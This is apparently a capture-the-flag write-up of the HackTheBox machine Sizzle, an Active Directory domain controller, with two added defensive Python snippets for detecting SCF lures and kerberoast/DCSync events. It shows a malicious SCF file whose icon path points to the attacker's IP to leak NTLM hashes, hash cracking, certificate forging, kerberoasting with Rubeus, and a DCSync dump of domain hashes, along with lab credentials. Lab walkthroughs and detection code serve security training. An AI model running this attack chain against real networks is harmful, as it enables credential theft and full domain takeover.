Sizzle on HackTheBox

Before all

Insane, so hard to play qwq
In the end I got beaten up badly enough to go read the write-up.
Victim’s IP : 10.10.10.103
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

rustscan -a 10.10.10.103 --ulimit 5000 -- -sC -sV -Pn

Result

PORT      STATE SERVICE       REASON          VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:52+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2024-12-29T02:58:51+00:00; 0s from scanner time.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:51+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:52+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-29T02:58:51+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA/domainComponent=HTB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b:1eff:5a65:ad8d:c64d:855e:aeb5:9e6b
| SHA-1: 77bb:3f67:1b6b:3e09:b8f9:6503:ddc1:0bbf:0b75:0c72
| -----BEGIN CERTIFICATE-----
| MIIFPTCCBCWgAwIBAgITaQAAAAXvru32D6T3IQAAAAAABTANBgkqhkiG9w0BAQsF
| ... a lot of stuffs
|_-----END CERTIFICATE-----
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58437/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58456/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

A Windows host with SMB, LDAP, MSRPC and an intriguing port 80 open.
We get the domain HTB.LOCAL and the hostname sizzle; notably, Kerberos is not exposed.

directory enumeration

Command

dirsearch --url 'http://10.10.10.103'

Result

[04:09:12] Starting:                                                                                
[04:09:15] 403 - 312B - /%2e%2e//google.com
[04:09:15] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[04:09:15] 404 - 2KB - /.ashx
[04:09:15] 404 - 2KB - /.asmx
[04:09:29] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[04:09:34] 404 - 2KB - /admin%20/
[04:09:35] 404 - 2KB - /admin.
[04:09:49] 301 - 157B - /aspnet_client -> http://10.10.10.103/aspnet_client/
[04:09:49] 403 - 1KB - /aspnet_client/
[04:09:49] 404 - 2KB - /asset..
[04:09:54] 403 - 1KB - /certenroll/
[04:09:54] 401 - 1KB - /certsrv/
[04:09:54] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[04:10:02] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[04:10:11] 403 - 1KB - /images/
[04:10:11] 301 - 150B - /images -> http://10.10.10.103/images/
[04:10:12] 404 - 2KB - /index.php.
[04:10:14] 404 - 2KB - /javax.faces.resource.../
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[04:10:14] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[04:10:14] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[04:10:14] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[04:10:14] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[04:10:14] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[04:10:14] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[04:10:17] 404 - 2KB - /login.wdm%2e
[04:10:19] 404 - 2KB - /mcx/mcxservice.svc
[04:10:32] 404 - 2KB - /rating_over.
[04:10:32] 404 - 2KB - /reach/sip.svc
[04:10:36] 404 - 2KB - /service.asmx
[04:10:41] 404 - 2KB - /static..
[04:10:47] 403 - 2KB - /Trace.axd
[04:10:47] 404 - 2KB - /umbraco/webservices/codeEditorSave.asmx
[04:10:51] 404 - 2KB - /WEB-INF./
[04:10:53] 404 - 2KB - /WebResource.axd?d=LER8t9aS
[04:10:53] 404 - 2KB - /webticket/webticketservice.svc

Note a path that requires HTTP auth, /certsrv; a quick search shows it is the AD Certificate Services web enrollment:
https://learn.microsoft.com/zh-tw/windows-server/identity/ad-cs/certificate-authority-web-enrollment

Exploit

scf file attack

SMB allows guest login without a password, so let's enumerate it first :D
Command

smbclient -L //10.10.10.103/ -N

Result

Sharename          Type      Comment
---------          ----      -------
ADMIN$             Disk      Remote Admin
C$                 Disk      Default share
CertEnroll         Disk      Active Directory Certificate Services share
Department Shares  Disk
IPC$               IPC       Remote IPC
NETLOGON           Disk      Logon server share
Operations         Disk
SYSVOL             Disk      Logon server share

On inspection, only Department Shares can be accessed and listed…
Mount it on our own box to search through it:

sudo mount -t cifs -o rw,username=guest,password= '//10.10.10.103/Department Shares' /mnt

Next, use the following script to find writable directories:
find-w.sh

#!/bin/bash
# Walk every directory under the mount point and report the ones we can write to.
# Paths are NUL-delimited so share names containing spaces are handled correctly.
find /mnt -type d -print0 | while IFS= read -r -d '' d; do
    # Try to create a probe file; failure means the directory is not writable for us.
    if touch "$d/x" 2>/dev/null; then
        echo "$d is writable"
        rm -f "$d/x"   # remove the probe file again
    fi
done

Result

/mnt/Users/Public  is writable
/mnt/ZZ_ARCHIVE is writable

Next, drop a malicious SCF file onto the host; for the details see:
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

@exp.scf

[Shell]
Command=2
IconFile=\\10.10.14.14\share\whale.ico
[Taskbar]
Command=ToggleDesktop

Finally, put it on the host:

┌──(kali🐳kali)-[~/ctf/hackthebox/sizzle]
└─$ smbclient '//10.10.10.103/Department Shares' -N
Try "help" to get a list of possible commands.
smb: \> cd Users/Public
smb: \Users\Public\> put @exp.scf
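The defender's counterpart to the lure above, as an added example that is not part of this write-up: it sweeps a locally mounted share (like the /mnt mount used earlier) for .scf files whose IconFile points at a UNC host outside a trusted list, which is exactly the pattern that makes Explorer leak NTLM hashes on folder view. The trusted-host list and the sample files the demo creates are assumptions for the demo.

```python
import configparser
import os
import re
import tempfile

# Host part of a UNC path such as \\10.10.14.14\share\whale.ico
UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")

def icon_host(scf_text):
    """Return the UNC host named by the [Shell] IconFile entry, or None
    when the icon is local or the file has no such entry."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(scf_text)
    icon = cp.get("Shell", "IconFile", fallback="").strip()
    m = UNC_HOST.match(icon)
    return m.group(1).lower() if m else None

def find_scf_lures(root, trusted_hosts):
    """Walk the mounted share under `root` and return (path, host) for every
    .scf file whose IconFile points at a host outside `trusted_hosts`."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                host = icon_host(fh.read())
            if host and host not in trusted:
                hits.append((path, host))
    return hits

def demo():
    """Constructed sample share (assumption): the @exp.scf lure from above
    next to a benign SCF whose icon lives on the domain controller itself."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "Users", "Public")
    os.makedirs(public)
    lure = ("[Shell]\nCommand=2\nIconFile=\\\\10.10.14.14\\share\\whale.ico\n"
            "[Taskbar]\nCommand=ToggleDesktop\n")
    benign = lure.replace("\\\\10.10.14.14\\share", "\\\\sizzle.htb.local\\NETLOGON")
    for name, body in (("@exp.scf", lure), ("desktop.scf", benign)):
        with open(os.path.join(public, name), "w") as fh:
            fh.write(body)
    return find_scf_lures(root, ["sizzle.htb.local", "sizzle"])
```

Run find_scf_lures against the real mount point with your own file-server names as the trusted list; a hit on a world-writable folder such as Users/Public is the lure the write-up plants.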

Next, use Responder to listen for everything on tun0:

sudo responder -I tun0

Result

[SMB] NTLMv2-SSP Client   : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:e78d6bf8ec9ce... (truncated)

The capture succeeded; run a dictionary attack on the hash with john

john hash --wordlist=/home/kali/rockyou.txt

Log in to http://10.10.10.103 with the obtained credentials

But evil-winrm fails to log in… certificate error, so we first need to get a new one

Apply for a new cert

Generate a new private key and CSR with openssl:

openssl req -new -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr

Then go to Request a certificate -> advanced certificate request, create a new certificate request and upload amanda.csr

Finally, download the certificate in Base64 encoding

Connect with evil-winrm:
Command

evil-winrm -i 10.10.10.103 -u amanda -S -c certnew.cer -k amanda.key

P.S. The -u option apparently doesn't need to be specified…

Privilege Escalation

As usual, start with BloodHound to gather information:

bloodhound-python -c All -u 'amanda' -p 'Ashare1972' -d HTB.LOCAL -ns 10.10.10.103 --zip

Notice that MRLKY is kerberoastable:

kerberoasting with Rubeus

Since Kerberos is not exposed externally, run the attack from inside the host with Rubeus:

.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972


Crack the obtained TGS with john; with the password in hand, go through the certificate request flow above once more and you can log in again with evil-winrm.

DCSync

The usual, unsurprising DCSync…
Attack with impacket-secretsdump:

impacket-secretsdump 'htb.local'/'mrlky':'Football#7'@'htb.local'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
... a lot of stuffs
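Added detection example for the two escalation steps above (the Rubeus kerberoast of MRLKY and the secretsdump DCSync), not part of the write-up: it triages Security-log 4769 and 4662 records modelled as dicts keyed by their EventData field names. The event records are constructed samples, and SIZZLE$ as the domain controller's computer account is an assumption.

```python
# Control-access-right GUIDs that DRSUAPI replication (what secretsdump used) needs.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
RC4_HMAC = "0x17"  # TicketEncryptionType that Rubeus kerberoast requests by default

def is_kerberoast(ev):
    """4769: a user account requested an RC4 service ticket for a service
    that is itself a user account (an SPN on a user, like MRLKY above)."""
    requester = ev.get("TargetUserName", "").split("@")[0]
    service = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not requester.endswith("$")
            and not service.endswith("$")
            and service.lower() != "krbtgt")

def is_dcsync(ev, dc_accounts):
    """4662: a replication right was exercised by something other than a
    domain controller's own computer account (upper-cased names)."""
    props = ev.get("Properties", "").lower()
    return (ev.get("EventID") == 4662
            and any(g in props for g in REPL_GUIDS)
            and ev.get("SubjectUserName", "").upper() not in dc_accounts)

def triage(events, dc_accounts=("SIZZLE$",)):
    """Return (label, detail) alerts for an iterable of event dicts."""
    dc_accounts = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if is_kerberoast(ev):
            alerts.append(("kerberoast", f"{ev['TargetUserName']} -> {ev['ServiceName']}"))
        elif is_dcsync(ev, dc_accounts):
            alerts.append(("dcsync", ev["SubjectUserName"]))
    return alerts

# Constructed samples (not real logs): roast of mrlky, a normal AES TGT, DCSync as mrlky, DC replicating.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "amanda@HTB.LOCAL", "ServiceName": "mrlky",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.103"},
    {"EventID": 4769, "TargetUserName": "SIZZLE$@HTB.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.103"},
    {"EventID": 4662, "SubjectUserName": "mrlky",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "SIZZLE$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]
```

Note the RemoteOperations failure in the output above: the DRSUAPI path still succeeded, so a detection keyed only on remote registry or service creation would miss it, while the 4662 replication rights would not.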

Finally, pass the hash with smbexec

OWNED

After all

Strictly speaking, only the first step on this box, the SCF and cert part, really got me stuck; it wasn't as hard as I imagined (?)
Still learned a lot, happy happy